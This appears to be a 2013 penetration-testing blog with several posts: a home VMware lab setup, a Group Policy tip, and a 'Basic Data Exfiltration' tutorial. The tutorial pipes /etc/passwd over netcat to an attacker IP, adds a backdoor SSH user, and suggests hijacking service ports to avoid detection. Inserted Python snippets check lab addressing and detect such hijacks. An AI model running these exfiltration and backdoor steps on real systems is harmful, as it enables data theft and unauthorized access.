Sunday, February 24, 2013

SANS SEC660

Hey all,

I'm excited to let you guys know that I'll be taking the SEC660 class offered by SANS Institute. For the whole of next week (5.5 days), the course will be covering more advanced areas of penetration testing and I can't wait! More information on SEC660 can be found here: https://www.sans.org/course/advanced-penetration-testing-exploits-ethical-hacking

Previously, I took the 'basics' version of the curriculum by SANS, SEC560, and found that the course teaches you more than 'academic materials' or 'theories': it provides you with practical, working knowledge to do your job as a security professional. In addition, the instructors are veteran professionals themselves and they shared quite a fair bit of their on-the-job experience, which is extremely valuable.

If you're taking SEC660 or other courses next week in Secure Singapore 2013, drop me a note to link up and I'll buy you a cuppa.

Break To Protect,
J.S.

Friday, February 15, 2013

Setting up a Penetration Testing Environment

Just a while ago, I was talking to another security enthusiast and we were discussing how to set up a pentest environment at home. The worst thing is that I only had access to VMware Workstation and was attacking from a BackTrack 5 VM to a vulnerable machine. But that's just ONE hop, and REAL environments have multiple hops (e.g. through a firewall, a DMZ, an internal network and one more internal network).

Although I've read a couple of articles on setting up a penetration testing environment, I still had no idea how to make one until yesterday. While reading up on VMware material, I discovered this valuable page that solves the problem of virtualizing your attacking and victim machines with firewalls and load balancers in the equation to test. Try reading this:
http://www.vmware.com/support/ws55/doc/ws_net_configurations_custom.html

Prerequisites:
1. RAM, LOTSA RAM (I'm on 8GB)
2. Enough CPU resources (I'm on an i5)
3. Of course, enough HDD space (I'm on a 128GB SSD and a 500GB HDD)
4. VMware Workstation (I'm on 8)
5. VMware images (in this demo, I'll be using BTR5 (BackTrack 5), Smoothwall 3 Polar, and an exploitable machine)


Configuring your VMWare Network Adaptors:
BTR5 - Two Network Adaptors
1. Bridged (or Vmnet 0)
2. VMnet 9 (Set Host-only)

Smoothwall 3 - Two Network Adaptors
1. VMnet 9 (Set Host-only)
2. VMnet 2 (Set Host-only)

Win XP / Metasploitable / Kioptrix / other vulnerable victim machines
1. VMnet 2 (Set Host-only)

VMWare Workstation - Open Edit -> Virtual Network Editor
Add VMnet 2 and 9. DHCP is optional.

* Whatever IP range you use for a VMnet, do not assign x.x.x.1 to a VM, as that address is used by VMware's virtual switch.

Setting up your network:
BTR5 (*your eth[num] may be different, so adjust accordingly)
1. eth0 to your real local network address. Mine is 10.0.0.x/24. You'll be able to access the internet from your BackTrack 5 for apt-get installs and wget of useful tools ;)
2. eth1 to 10.0.9.3/24
Set your default gateway to 10.0.9.2 (Smoothwall 3's IP)

Smoothwall 3
1. Login as 'root' using 'happydays' as password
2. set your eth0 to 10.0.9.2/24
3. set your eth1 to 10.0.2.2/24
* Remember to keep track of which network adaptor is connected to which VMnet; it's easy to mix them up.

Win XP
1. Set your "Local Area Connection" interface to 10.0.2.100/24 and gateway to 10.0.2.2 (Smoothwall 3's IP also)

By now you should be able to do WIN XP -PING-> BTR5 and get a response.
However, for some reason you won't be able to have BTR5 ping WIN XP.
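As an added example (not part of the original post), here is a small Python check of the addressing plan above: it catches a VM assigned the x.x.x.1 switch address, adapters on the same VMnet with mismatched subnets, duplicate addresses, and gateways that are off-link or belong to no lab interface. The plan dictionary is constructed from the steps above, and `LAB_PLAN` and `check_plan` are names chosen for this example.

```python
import ipaddress

# Addressing plan from the post, written down as data (constructed for this check):
# interface -> (address/prefix, VMnet it is attached to, default gateway or None)
LAB_PLAN = {
    "btr5.eth1":       ("10.0.9.3/24",   "VMnet9", "10.0.9.2"),
    "smoothwall.eth0": ("10.0.9.2/24",   "VMnet9", None),
    "smoothwall.eth1": ("10.0.2.2/24",   "VMnet2", None),
    "winxp.lan":       ("10.0.2.100/24", "VMnet2", "10.0.2.2"),
}

def check_plan(plan):
    """Return a list of problems found in a lab addressing plan (empty list = consistent)."""
    problems = []
    subnet_of = {}   # VMnet -> subnet seen on that VMnet
    owner_of = {}    # address -> interface that claims it
    for name, (cidr, vmnet, _gateway) in plan.items():
        iface = ipaddress.ip_interface(cidr)
        net = iface.network
        # x.x.x.1 on every VMnet belongs to VMware's virtual switch (the host side)
        if iface.ip == net.network_address + 1:
            problems.append(f"{name}: {iface.ip} is the VMware virtual-switch address on {vmnet}")
        # every adapter attached to one VMnet must share the same subnet
        if vmnet in subnet_of and subnet_of[vmnet] != net:
            problems.append(f"{name}: {net} does not match {subnet_of[vmnet]} on {vmnet}")
        subnet_of.setdefault(vmnet, net)
        # no two adapters may claim the same address
        if iface.ip in owner_of:
            problems.append(f"{name}: {iface.ip} is already used by {owner_of[iface.ip]}")
        owner_of[iface.ip] = name
    for name, (cidr, _vmnet, gateway) in plan.items():
        if gateway is None:
            continue
        gw = ipaddress.ip_address(gateway)
        net = ipaddress.ip_interface(cidr).network
        # the gateway must be on-link and must be a real lab interface (here: the Smoothwall)
        if gw not in net:
            problems.append(f"{name}: gateway {gw} is not on {net}")
        elif gw not in owner_of:
            problems.append(f"{name}: gateway {gw} is not assigned to any lab interface")
    return problems

if __name__ == "__main__":
    for problem in check_plan(LAB_PLAN) or ["plan is consistent"]:
        print(problem)
```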

Now is a good time to log in to your Smoothwall 3's web interface and start configuring it:
https://10.0.2.2:441/ using 'admin' with the password 'happydays'

In this post I won't be sharing Smoothwall's configuration for port forwarding and other settings. And REMEMBER, to make your Smoothwall's INTERFACE CONFIGURATION persistent, you'll need to CHANGE the interfaces' IP addresses using the web GUI.

Need help? Send me an email: breaktoprotect(at)gmail(dot)com

Thanks for reading. Happy fun times, people~

Break To Protect,
J.S.

Wednesday, February 13, 2013

Klutz with Local Group Policy

Part of my work requires me to perform configuration reviews of the security settings on my clients' hosts. One of them is a Windows 2003 host, and I was experimenting with a VM image. It took me quite a while of searching on Google to find out WHY gpresult kept showing "No local group policy applied (empty)" despite me changing some settings in gpedit.msc.

Long story cut short, you NEED to set something under BOTH 'Computer Configuration' and 'User Configuration'. So even if you've set a trillion settings under 'Computer Configuration' and none under 'User Configuration', you'll get zilch when you run gpresult /z > gpresults_%computername%.txt. And the same applies vice versa.[1]

After setting ONE item under 'User Configuration', I saw that my Local Group Policy was finally applied when I ran gpresult. Awesome and phew~ Thank you, forum folks from www.techexams.net

Break To Protect,
J. S.


Reference(s):
[1] http://www.techexams.net/forums/mcsa-mcse-windows-2003-general/66468-gpo-were-not-applied-because-they-were-filtered-out.html

Sunday, February 10, 2013

Basic Data Exfiltration

So you've pwned the system and got root access. Awesome, but what's next? Oh, I need to get /etc/passwd and /etc/shadow out for a start. OK, how?

There are a couple of ways to do it:
1. Meterpreter's 'download' command
It's great if you're using Meterpreter as the payload. Simple and hassle-free. Just 'cd' and 'pwd' through the victim machine's directories without having to worry about the OS platform. The limitation is that if you are not using Metasploit to pwn your victim machine, you can't do this.

2. Netcat
Meow! Using this network utility to transfer a binary file is definitely a viable option.
All you'll need to do is:

Attacking Machine:~/goodies_folder/# nc -l -p 4444 > file_i_am_stealing.ext

Victim Machine:/etc/# cat passwd | nc 192.168.1.200 4444
* 192.168.1.200 is, of course, the attacker's machine IP address, and 4444 is the port the listener above is waiting on

Let's say the machine you've compromised has a host-based firewall that whitelists ports and denies all others. There are two ways to circumvent this:
- Tweak iptables <= Not recommended, coz' you're changing critical configuration of the host machine. I wouldn't want to trigger the IPS or FIM monitoring this victim machine :S
- Shut down a service and hijack the port. <= Say the XYZ service is pretty much unused but is listening on port 112. Shut down the XYZ service, perform the exfil and then turn it back up.

3. SSH
If the SSH daemon is up, create a new user, e.g. ted:
Victim Machine:~/# /usr/sbin/useradd ted
Victim Machine:~/# /usr/bin/passwd ted
* Set your password
Victim Machine:~/# echo "AllowUsers ted" >> /etc/ssh/sshd_config
Remember to do a netstat -tulpn | grep sshd to make sure that the SSH service is up.

Attacker's Machine:~/# ssh ted@192.168.1.100
* Enter the password you set when prompted (ssh does not take the password as a command-line argument)

4. wget
Good if your victim's machine has an Apache web server up and running.
Simply copy all the files you wanna exfil to /var/www/html
and then:

Attacker's machine:~/# wget http://192.168.1.100/file_you_wanna_retrieve.ext
Again, you want to make sure that the victim's Apache is running ;)

5. Other ways
There are a couple more ways, but I need to run already, so here are some brief mentions:
- FTP <-- Set up FTP, or SCP your files through
- Covert Channels <-- You can craft ICMP packets and fit your data inside. Haven't tried it yet, but will blog it when I do.
- Email <-- It's lame, but if you've got startx or you've VNC-ed into your victim's machine, you can exfil through a web browser =D
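As an added defender-side example (not from the original post), here is a Python check for the port-hijack trick in section 2 and the `netstat -tulpn` habit in section 3: it parses netstat output and flags any listening port whose owning program differs from a baseline, which is exactly what a stopped service replaced by netcat looks like. The netstat sample and the baseline are constructed for this example, and `xyzd` is a hypothetical name for the post's "XYZ service".

```python
import re

# Constructed sample of `netstat -tulpn` output (not a real capture). It models the trick from
# section 2: the unused "XYZ" service on port 112 was stopped and netcat bound to its port.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:112             0.0.0.0:*               LISTEN      4127/nc
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      933/mysqld
udp        0      0 0.0.0.0:68              0.0.0.0:*                           644/dhclient
"""

# Hypothetical baseline of which program should own each listening port on this host.
EXPECTED_LISTENERS = {
    ("tcp", 22): "sshd",
    ("tcp", 112): "xyzd",      # the "XYZ service" from the post
    ("tcp", 3306): "mysqld",
    ("udp", 68): "dhclient",
}

LINE_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<laddr>\S+)\s+\S+\s+"
    r"(?:LISTEN\s+)?(?P<pid>\d+)/(?P<prog>\S+)"
)

def parse_listeners(text):
    """Return {(proto, port): program} for each listening socket in netstat -tulpn output."""
    listeners = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                       # header line
        proto = m.group("proto").rstrip("6")
        port = int(m.group("laddr").rsplit(":", 1)[1])
        listeners[(proto, port)] = m.group("prog")
    return listeners

def audit_listeners(text, expected):
    """Compare live listeners with the baseline and return human-readable findings."""
    findings, actual = [], parse_listeners(text)
    for (proto, port), prog in sorted(actual.items()):
        want = expected.get((proto, port))
        if want is None:
            findings.append(f"{proto}/{port}: unexpected listener {prog}")
        elif prog != want:
            findings.append(f"{proto}/{port}: expected {want}, found {prog}")
    for (proto, port), want in sorted(expected.items()):
        if (proto, port) not in actual:
            findings.append(f"{proto}/{port}: expected {want} is not listening")
    return findings
```

Run it against the real output of `netstat -tulpn` (or `ss -tulpn` after adjusting the regex) from a FIM or cron job, and compare the baseline to the host's build standard.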

Alrighty, hope these help. Gotta run. Happy fun times~

Break To Protect,
J.S.